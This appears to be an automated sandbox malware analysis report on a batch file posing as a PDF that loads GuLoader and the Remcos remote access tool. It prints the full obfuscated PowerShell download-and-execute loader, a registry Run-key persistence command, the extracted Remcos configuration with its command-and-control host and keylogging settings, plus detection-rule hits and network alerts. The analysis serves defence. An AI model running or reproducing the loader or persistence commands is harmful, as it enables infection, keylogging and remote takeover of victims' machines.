Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Alior,pdf.bat

Overview

General Information

Sample name:Alior,pdf.bat
Analysis ID:1643269
MD5:cfd71e45c097038100763c352a1e4bbb
SHA1:d24ce3511c8e0d34797535e4c06d54304a063e6b
SHA256:d9aa38cd99865a34134cce64676db7fea4a4a37b48596a8d7e694c0b847d6a48
Tags:batuser-TeamDreier
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Uses dynamic DNS services
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6200 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Alior,pdf.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6392 cmdline: powershell.exe -windowstyle hidden "Get-Service;$Bjrgningsfartjet='func';Get-History;$Bjrgningsfartjet+='t';Get-History;$Bjrgningsfartjet+='ion:';(ni -p $Bjrgningsfartjet -n Slede -value { param($Monastically);$Asherah229=1;do {$Specifikationsmetodikker+=$Monastically[$Asherah229];$Asherah229+=2} until(!$Monastically[$Asherah229])$Specifikationsmetodikker});ConvertTo-Html;(ni -p $Bjrgningsfartjet -n Studiefagets -value {param($Variabelerklringers);.($kvalt) ($Variabelerklringers)});ConvertTo-Html;$Sternocleidomastoid=Slede 'gnBE TH.NW';$Sternocleidomastoid+=Slede 'PE BPC LQiGe.N T';$bogklubbgers=Slede ' MNoszki lBlMa /';$Bottomers8=Slede 'VT,l s 1 2';$Fendillation=' [ nSe TU.SS EErtvSi c,E P O.i N.t mTaIn a.GBeBR.] : :GS EAC u r,I t Y p r OPTTO CDoClS= $ BPo TNtWO,m E.RSS 8';$bogklubbgers+=Slede ' 5C..0. S( W i n d,o wBsR NIT .1 0U..0.; UW ionC6F4V;S NxO6,4 ;K rPvF: 1T3P4.. 0A)D G eMc k.oM/,2R0A1,0 0,1 0E1 LFOi.rDe f oTx / 1,3P4u. 0';$Postventral=Slede 'SUAS E R -SaCg.E,NEt';$Spunshul=Slede 'IhStgt pa:L/D/Du dPiNrDeA. wEe,b pKg,.,i tR/ H,alr.mPognMi k a ejr nNe.. mAi x';$Putidness=Slede 'R>';$kvalt=Slede ' iUE.x';$Fluesnapperes='Opnaaende';$Undarkened='\Rdkindedes90.Par';Studiefagets (Slede ' $Dg.lSO.b,a.Ld:HD a TUa B EShUa NTDOlUeDS =k$ EAnAvN:MA PsP dDA Tea + $RuPn D AIrDKSE N ESd');Studiefagets (Slede 'S$Sg,l oABGa lB:,b o D e l S 1K0 3N=A$ sUP u.nMS.H u L,..s pBL IOt (S$ pCUGtUIVDpNKe s s,)');Studiefagets (Slede $Fendillation);$Spunshul=$Bodels103[0];$Perosmic=(Slede ' $pG.lOo bOA LB:MD i.F,tEEUR.INsA= nBEUwD-.o bRj,E cktF sTyLSNtVe mH.O$,S tFE,R,nSoSCFlnE ITd O M A s tIO I D');Studiefagets ($Perosmic);Studiefagets (Slede ' $ DBi fPtSe rIiPs .MH e aTd e rFs,[B$ ProdsAt v.eSnPt rSa lS] =A$ b o,gTkAl u.bfb gFeDrHs');$Storefronts=Slede ' $SDJi.fpt e r i s,..DsoBwAnSlToBa d FTi,lSe ( $KS p.uEnKsTh u l , $SD eDnui e rIeFn,sS)';$Denierens=$Databehandles;Studiefagets (Slede ' $MG.LJo BBaSlM:IGHrDAEfHi k.s ySsDt e m E t =O( TfE S t -APFa T HA A$,D e NFiDEPRCeSNMs )');while (!$Grafiksystemet) {Studiefagets (Slede 'B$IgPl o bRa lS:SU nSf a iSlGa bSlDy = $ SktCi nHkRe,t') ;Studiefagets $Storefronts;Studiefagets (Slede 'a[,t H r E asdSiPnNGS. T H R E a,d ] : :osAlTeSeSpV( 4T0 0P0 )');Studiefagets (Slede ' $ gvlIoEBEanL :,gDrFACfsiMK sDywS,T e,m eUTB=,( t E s TO-WPTa t HT O$ d E.NBI,EHr efNSS )') ;Studiefagets (Slede 'P$ gFlAo bAa lP:WPHE r I.p.nFE u MAOBn ISaS=U$EgOL.o b a lS:Np OHSRT NDaPt.a LRl y + + %S$ bHO dPe lDs.1b0D3 .JCUoDurNST') ;$Spunshul=$Bodels103[$Peripneumonia]}$Transcenderende=329225;$Ultrastructurally=28193;Studiefagets (Slede ' $ G.lAO bIa.l : FUE.MHEDt A gMe,rSS HDU s e sR P=C BG eITT-GCOo nKTBe n.TS B$DdDe,N ISEHrSEPNKs');Studiefagets (Slede '.$Sg.lSo bVaMl :FsStSeSgWe p aMnUd ePr n e sS = ,[ISByUsIt e m . C,o n.v eIr t.]D: :VFAraoVmMBKaGs ef6P4 S tRrDi.nTg ( $bFTedmSeDt,aRg e r sKh u saeAs,)');Studiefagets (Slede 'S$Kg LHo B a lS:AHdA VAe A BCLSEN O=F M[ S.y SetaeAM ..tAe xFT .REMnBcUO dTI n GS]L:C:Ha S,C i IA.BGDePT,SStDrGi n GR(.$ sFTTe gOE PRABn dFE rCNOE s )');Studiefagets (Slede ' $SgPlEOHB A lm:BRBAPa.D IRg H e d s b E.LVBR=,$VHAA V eFAmb,L e .DSLu b s TSrTiMnOg ( $ITBRSA nas CLeBN,d EGr,EDN DCeR, $PUcLAt.r,aRS.t RRU CITNu,r a,lOLMy )');Studiefagets $Raadighedsbelb;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6948 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Bjrgningsfartjet='func';Get-History;$Bjrgningsfartjet+='t';Get-History;$Bjrgningsfartjet+='ion:';(ni -p $Bjrgningsfartjet -n Slede -value { param($Monastically);$Asherah229=1;do {$Specifikationsmetodikker+=$Monastically[$Asherah229];$Asherah229+=2} until(!$Monastically[$Asherah229])$Specifikationsmetodikker});ConvertTo-Html;(ni -p $Bjrgningsfartjet -n Studiefagets -value {param($Variabelerklringers);.($kvalt) ($Variabelerklringers)});ConvertTo-Html;$Sternocleidomastoid=Slede 'gnBE TH.NW';$Sternocleidomastoid+=Slede 'PE BPC LQiGe.N T';$bogklubbgers=Slede ' MNoszki lBlMa /';$Bottomers8=Slede 'VT,l s 1 2';$Fendillation=' [ nSe TU.SS EErtvSi c,E P O.i N.t mTaIn a.GBeBR.] : :GS EAC u r,I t Y p r OPTTO CDoClS= $ BPo TNtWO,m E.RSS 8';$bogklubbgers+=Slede ' 5C..0. S( W i n d,o wBsR NIT .1 0U..0.; UW ionC6F4V;S NxO6,4 ;K rPvF: 1T3P4.. 0A)D G eMc k.oM/,2R0A1,0 0,1 0E1 LFOi.rDe f oTx / 1,3P4u. 0';$Postventral=Slede 'SUAS E R -SaCg.E,NEt';$Spunshul=Slede 'IhStgt pa:L/D/Du dPiNrDeA. wEe,b pKg,.,i tR/ H,alr.mPognMi k a ejr nNe.. mAi x';$Putidness=Slede 'R>';$kvalt=Slede ' iUE.x';$Fluesnapperes='Opnaaende';$Undarkened='\Rdkindedes90.Par';Studiefagets (Slede ' $Dg.lSO.b,a.Ld:HD a TUa B EShUa NTDOlUeDS =k$ EAnAvN:MA PsP dDA Tea + $RuPn D AIrDKSE N ESd');Studiefagets (Slede 'S$Sg,l oABGa lB:,b o D e l S 1K0 3N=A$ sUP u.nMS.H u L,..s pBL IOt (S$ pCUGtUIVDpNKe s s,)');Studiefagets (Slede $Fendillation);$Spunshul=$Bodels103[0];$Perosmic=(Slede ' $pG.lOo bOA LB:MD i.F,tEEUR.INsA= nBEUwD-.o bRj,E cktF sTyLSNtVe mH.O$,S tFE,R,nSoSCFlnE ITd O M A s tIO I D');Studiefagets ($Perosmic);Studiefagets (Slede ' $ DBi fPtSe rIiPs .MH e aTd e rFs,[B$ ProdsAt v.eSnPt rSa lS] =A$ b o,gTkAl u.bfb gFeDrHs');$Storefronts=Slede ' $SDJi.fpt e r i s,..DsoBwAnSlToBa d FTi,lSe ( $KS p.uEnKsTh u l , $SD eDnui e rIeFn,sS)';$Denierens=$Databehandles;Studiefagets (Slede ' $MG.LJo BBaSlM:IGHrDAEfHi k.s ySsDt e m E t =O( TfE S t -APFa T HA A$,D e NFiDEPRCeSNMs )');while (!$Grafiksystemet) {Studiefagets (Slede 'B$IgPl o bRa lS:SU nSf a iSlGa bSlDy = $ SktCi nHkRe,t') ;Studiefagets $Storefronts;Studiefagets (Slede 'a[,t H r E asdSiPnNGS. T H R E a,d ] : :osAlTeSeSpV( 4T0 0P0 )');Studiefagets (Slede ' $ gvlIoEBEanL :,gDrFACfsiMK sDywS,T e,m eUTB=,( t E s TO-WPTa t HT O$ d E.NBI,EHr efNSS )') ;Studiefagets (Slede 'P$ gFlAo bAa lP:WPHE r I.p.nFE u MAOBn ISaS=U$EgOL.o b a lS:Np OHSRT NDaPt.a LRl y + + %S$ bHO dPe lDs.1b0D3 .JCUoDurNST') ;$Spunshul=$Bodels103[$Peripneumonia]}$Transcenderende=329225;$Ultrastructurally=28193;Studiefagets (Slede ' $ G.lAO bIa.l : FUE.MHEDt A gMe,rSS HDU s e sR P=C BG eITT-GCOo nKTBe n.TS B$DdDe,N ISEHrSEPNKs');Studiefagets (Slede '.$Sg.lSo bVaMl :FsStSeSgWe p aMnUd ePr n e sS = ,[ISByUsIt e m . C,o n.v eIr t.]D: :VFAraoVmMBKaGs ef6P4 S tRrDi.nTg ( $bFTedmSeDt,aRg e r sKh u saeAs,)');Studiefagets (Slede 'S$Kg LHo B a lS:AHdA VAe A BCLSEN O=F M[ S.y SetaeAM ..tAe xFT .REMnBcUO dTI n GS]L:C:Ha S,C i IA.BGDePT,SStDrGi n GR(.$ sFTTe gOE PRABn dFE rCNOE s )');Studiefagets (Slede ' $SgPlEOHB A lm:BRBAPa.D IRg H e d s b E.LVBR=,$VHAA V eFAmb,L e .DSLu b s TSrTiMnOg ( $ITBRSA nas CLeBN,d EGr,EDN DCeR, $PUcLAt.r,aRS.t RRU CITNu,r a,lOLMy )');Studiefagets $Raadighedsbelb;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 6560 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 1532 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Sorbed" /t REG_EXPAND_SZ /d "%Dalsnkningens% -windowstyle 1 $knobets=(gi 'HKCU:\Software\Nskeligeres117\').GetValue('Nskebarn');%Dalsnkningens% ($knobets)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 1640 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Sorbed" /t REG_EXPAND_SZ /d "%Dalsnkningens% -windowstyle 1 $knobets=(gi 'HKCU:\Software\Nskeligeres117\').GetValue('Nskebarn');%Dalsnkningens% ($knobets)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • svchost.exe (PID: 6996 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["idonetire.duckdns.org:52190:1"], "Assigned name": "NewRem", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-LSHWWC", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000E.00000002.3380138371.0000000008B46000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000E.00000002.3380138371.0000000008ACA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000E.00000002.3380138371.0000000008B2D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000004.00000002.1878451425.0000000009FDE000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: powershell.exe PID: 6392JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              Click to see the 4 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_6392.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_6948.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xbfdb:$b2: ::FromBase64String(
                • 0xb9f9:$s1: -join
                • 0x51a5:$s4: +=
                • 0x5267:$s4: +=
                • 0x948e:$s4: +=
                • 0xb5ab:$s4: +=
                • 0xb895:$s4: +=
                • 0xb9db:$s4: +=
                • 0x14803:$s4: +=
                • 0x14883:$s4: +=
                • 0x14949:$s4: +=
                • 0x149c9:$s4: +=
                • 0x14b9f:$s4: +=
                • 0x14c23:$s4: +=
                • 0x2c1b:$e4: Get-WmiObject
                • 0x2e0a:$e4: Get-Process
                • 0x2e62:$e4: Start-Process
                • 0x154b1:$e4: Get-Process

                System Summary

                barindex
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Dalsnkningens% -windowstyle 1 $knobets=(gi 'HKCU:\Software\Nskeligeres117\').GetValue('Nskebarn');%Dalsnkningens% ($knobets), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 1640, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sorbed
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Sorbed" /t REG_EXPAND_SZ /d "%Dalsnkningens% -windowstyle 1 $knobets=(gi 'HKCU:\Software\Nskeligeres117\').GetValue('Nskebarn');%Dalsnkningens% ($knobets)", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Sorbed" /t REG_EXPAND_SZ /d "%Dalsnkningens% -windowstyle 1 $knobets=(gi 'HKCU:\Software\Nskeligeres117\').GetValue('Nskebarn');%Dalsnkningens% ($knobets)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Sorbed" /t REG_EXPAND_SZ /d "%Dalsnkningens% -windowstyle 1 $knobets=(gi 'HKCU:\Software\Nskeligeres117\').GetValue('Nskebarn');%Dalsnkningens% ($knobets)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1532, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Sorbed" /t REG_EXPAND_SZ /d "%Dalsnkningens% -windowstyle 1 $knobets=(gi 'HKCU:\Software\Nskeligeres117\').GetValue('Nskebarn');%Dalsnkningens% ($knobets)", ProcessId: 1640, ProcessName: reg.exe
                Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 148.251.230.92, DesusertionIsIpv6: false, DesusertionPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6560, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49695
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Sorbed" /t REG_EXPAND_SZ /d "%Dalsnkningens% -windowstyle 1 $knobets=(gi 'HKCU:\Software\Nskeligeres117\').GetValue('Nskebarn');%Dalsnkningens% ($knobets)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Sorbed" /t REG_EXPAND_SZ /d "%Dalsnkningens% -windowstyle 1 $knobets=(gi 'HKCU:\Software\Nskeligeres117\').GetValue('Nskebarn');%Dalsnkningens% ($knobets)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6560, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Sorbed" /t REG_EXPAND_SZ /d "%Dalsnkningens% -windowstyle 1 $knobets=(gi 'HKCU:\Software\Nskeligeres117\').GetValue('Nskebarn');%Dalsnkningens% ($knobets)", ProcessId: 1532, ProcessName: cmd.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "Get-Service;$Bjrgningsfartjet='func';Get-History;$Bjrgningsfartjet+='t';Get-History;$Bjrgningsfartjet+='ion:';(ni -p $Bjrgningsfartjet -n Slede -value { param($Monastically);$Asherah229=1;do {$Specifikationsmetodikker+=$Monastically[$Asherah229];$Asherah229+=2} until(!$Monastically[$Asherah229])$Specifikationsmetodikker});ConvertTo-Html;(ni -p $Bjrgningsfartjet -n Studiefagets -value {param($Variabelerklringers);.($kvalt) ($Variabelerklringers)});ConvertTo-Html;$Sternocleidomastoid=Slede 'gnBE TH.NW';$Sternocleidomastoid+=Slede 'PE BPC LQiGe.N T';$bogklubbgers=Slede ' MNoszki lBlMa /';$Bottomers8=Slede 'VT,l s 1 2';$Fendillation=' [ nSe TU.SS EErtvSi c,E P O.i N.t mTaIn a.GBeBR.] : :GS EAC u r,I t Y p r OPTTO CDoClS= $ BPo TNtWO,m E.RSS 8';$bogklubbgers+=Slede ' 5C..0. S( W i n d,o wBsR NIT .1 0U..0.; UW ionC6F4V;S NxO6,4 ;K rPvF: 1T3P4.. 0A)D G eMc k.oM/,2R0A1,0 0,1 0E1 LFOi.rDe f oTx / 1,3P4u. 0';$Postventral=Slede 'SUAS E R -SaCg.E,NEt';$Spunshul=Slede 'IhStgt pa:L/D/Du dPiNrDeA. wEe,b pKg,.,i tR/ H,alr.mPognMi k a ejr nNe.. mAi x';$Putidness=Slede 'R>';$kvalt=Slede ' iUE.x';$Fluesnapperes='Opnaaende';$Undarkened='\Rdkindedes90.Par';Studiefagets (Slede ' $Dg.lSO.b,a.Ld:HD a TUa B EShUa NTDOlUeDS =k$ EAnAvN:MA PsP dDA Tea + $RuPn D AIrDKSE N ESd');Studiefagets (Slede 'S$Sg,l oABGa lB:,b o D e l S 1K0 3N=A$ sUP u.nMS.H u L,..s pBL IOt (S$ pCUGtUIVDpNKe s s,)');Studiefagets (Slede $Fendillation);$Spunshul=$Bodels103[0];$Perosmic=(Slede ' $pG.lOo bOA LB:MD i.F,tEEUR.INsA= nBEUwD-.o bRj,E cktF sTyLSNtVe mH.O$,S tFE,R,nSoSCFlnE ITd O M A s tIO I D');Studiefagets ($Perosmic);Studiefagets (Slede ' $ DBi fPtSe rIiPs .MH e aTd e rFs,[B$ ProdsAt v.eSnPt rSa lS] =A$ b o,gTkAl u.bfb gFeDrHs');$Storefronts=Slede ' $SDJi.fpt e r i s,..DsoBwAnSlToBa d FTi,lSe ( $KS p.uEnKsTh u l , $SD eDnui e rIeFn,sS)';$Denierens=$Databehandles;Studiefagets (Slede ' $MG.LJo BBaSlM:IGHrDAEfHi k.s ySsDt e m E t =O( TfE S t -APFa T HA A$,D e NFiDEPRCeSNMs )');while (!$Grafiksystemet) {Studiefagets (Slede 'B$IgPl o bRa lS:SU nSf a iSlGa bSlDy = $ SktCi nHkRe,t') ;Studiefagets $Storefronts;Studiefagets (Slede 'a[,t H r E asdSiPnNGS. T H R E a,d ] : :osAlTeSeSpV( 4T0 0P0 )');Studiefagets (Slede ' $ gvlIoEBEanL :,gDrFACfsiMK sDywS,T e,m eUTB=,( t E s TO-WPTa t HT O$ d E.NBI,EHr efNSS )') ;Studiefagets (Slede 'P$ gFlAo bAa lP:WPHE r I.p.nFE u MAOBn ISaS=U$EgOL.o b a lS:Np OHSRT NDaPt.a LRl y + + %S$ bHO dPe lDs.1b0D3 .JCUoDurNST') ;$Spunshul=$Bodels103[$Peripneumonia]}$Transcenderende=329225;$Ultrastructurally=28193;Studiefagets (Slede ' $ G.lAO bIa.l : FUE.MHEDt A gMe,rSS HDU s e sR P=C BG eITT-GCOo nKTBe n.TS B$DdDe,N ISEHrSEPNKs');Studiefagets (Slede '.$Sg.lSo bVaMl :FsStSeSgWe p aMnUd ePr n e sS = ,[ISByUsIt e m . C,o n.v eIr t.]D: :VFAraoVmMBKaGs ef6P4 S tRrDi.nTg ( $bFTedmSeDt,aRg e r sKh u saeAs,)');Studiefagets (Slede 'S$Kg LHo B a lS:AHdA VAe A BCLSEN O=F M[ S.y SetaeAM ..tAe xFT .REMnBcUO dTI n GS]L:C:Ha S,C i IA.BGDePT,SS
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6996, ProcessName: svchost.exe

                Stealing of Sensitive Information

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 6560, TargetFilename: C:\ProgramData\remcos\logs.dat
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-19T17:49:15.720064+010020365941Malware Command and Control Activity Detected192.168.2.94969694.198.96.16652190TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-19T17:49:18.797902+010028033043Unknown Traffic192.168.2.949697178.237.33.5080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-19T17:49:11.037117+010028032702Potentially Bad Traffic192.168.2.949695148.251.230.9280TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: idonetire.duckdns.orgAvira URL Cloud: Label: malware
                Source: 0000000E.00000002.3380138371.0000000008B2D000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["idonetire.duckdns.org:52190:1"], "Assigned name": "NewRem", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-LSHWWC", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                Source: Alior,pdf.batVirustotal: Detection: 11%Perma Link
                Source: Alior,pdf.batReversingLabs: Detection: 15%
                Source: Yara matchFile source: 0000000E.00000002.3380138371.0000000008B46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3380138371.0000000008ACA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3380138371.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6560, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1866565286.0000000007981000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49696 -> 94.198.96.166:52190
                Source: Malware configuration extractorURLs: idonetire.duckdns.org
                Source: global trafficTCP traffic: 94.198.96.166 ports 52190,0,1,2,5,9
                Source: unknownDNS query: name: idonetire.duckdns.org
                Source: global trafficTCP traffic: 192.168.2.9:49696 -> 94.198.96.166:52190
